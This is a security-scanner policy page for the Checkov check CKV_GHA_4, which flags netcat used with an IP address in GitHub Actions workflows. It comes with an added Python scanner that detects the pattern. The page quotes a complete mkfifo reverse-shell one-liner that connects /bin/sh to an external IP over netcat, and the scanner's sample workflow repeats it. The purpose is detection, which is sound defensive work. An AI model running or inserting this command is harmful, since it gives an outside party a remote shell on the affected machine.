Suspicious use of netcat with IP address
Error: GitHub Actions Netcat is being used with IP address
Bridgecrew Policy ID: BC_REPO_GITHUB_ACTION_4
Checkov Check ID: CKV_GHA_4
Severity: LOW
GitHub Actions Netcat is being used with IP address
Netcat in combination with an IP address can be used to establish a connection to an external computer or server. This can be used to open up backdoor access or exfiltrate data.
Fix - Buildtime
GitHub Actions
Block and remove code that attempts to make a connection over a network.
- rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|netcat 34.159.16.75 32032 >/tmp/f
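One way to catch this pattern in a workflow file before it is merged, as an added example (not Checkov's implementation of CKV_GHA_4 and not code from this page). The names `scan_workflow`, `netcat_with_ip` and `SAMPLE_WORKFLOW` are hypothetical, and the scanner is a line-based heuristic over `run:` steps rather than a full YAML parser.

```python
import ipaddress
import re

NETCAT_NAMES = {"nc", "ncat", "netcat"}
RUN_KEY = re.compile(r"^(\s*)(?:-\s+)?run:\s*(.*)$")

# Constructed workflow; the flagged command is the one quoted on this page.
SAMPLE_WORKFLOW = """\
jobs:
  build:
    steps:
      - name: wait for database
        run: nc -z localhost 5432
      - name: setup
        run: |
          rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|netcat 34.159.16.75 32032 >/tmp/f
      - run: curl -s http://10.0.0.5/artifact.tgz -o a.tgz
"""

def is_ip(token):
    try:
        return ipaddress.ip_address(token) is not None
    except ValueError:
        return False

def netcat_with_ip(command):
    """True if a shell segment runs nc/ncat/netcat with an IP literal argument."""
    for segment in re.split(r"[;|&\n]+", command):
        tokens = segment.split()
        for i, tok in enumerate(tokens):
            if tok.rsplit("/", 1)[-1] in NETCAT_NAMES and any(map(is_ip, tokens[i + 1:])):
                return True
    return False

def scan_workflow(text):
    """Return (line_number, stripped_line) for each matching line inside a run: step."""
    findings, run_indent = [], None
    for number, line in enumerate(text.splitlines(), start=1):
        match = RUN_KEY.match(line)
        indent = len(line) - len(line.lstrip())
        if match:
            run_indent, body = len(match.group(1)), match.group(2)
        elif run_indent is not None and (indent > run_indent or not line.strip()):
            body = line  # continuation of a multi-line run block
        else:
            run_indent, body = None, ""
        if netcat_with_ip(body):
            findings.append((number, line.strip()))
    return findings
```

In the sample, only the `netcat 34.159.16.75 32032` line is reported: the `nc -z localhost 5432` step uses a hostname, and the `curl` step contains an IP address but no netcat binary.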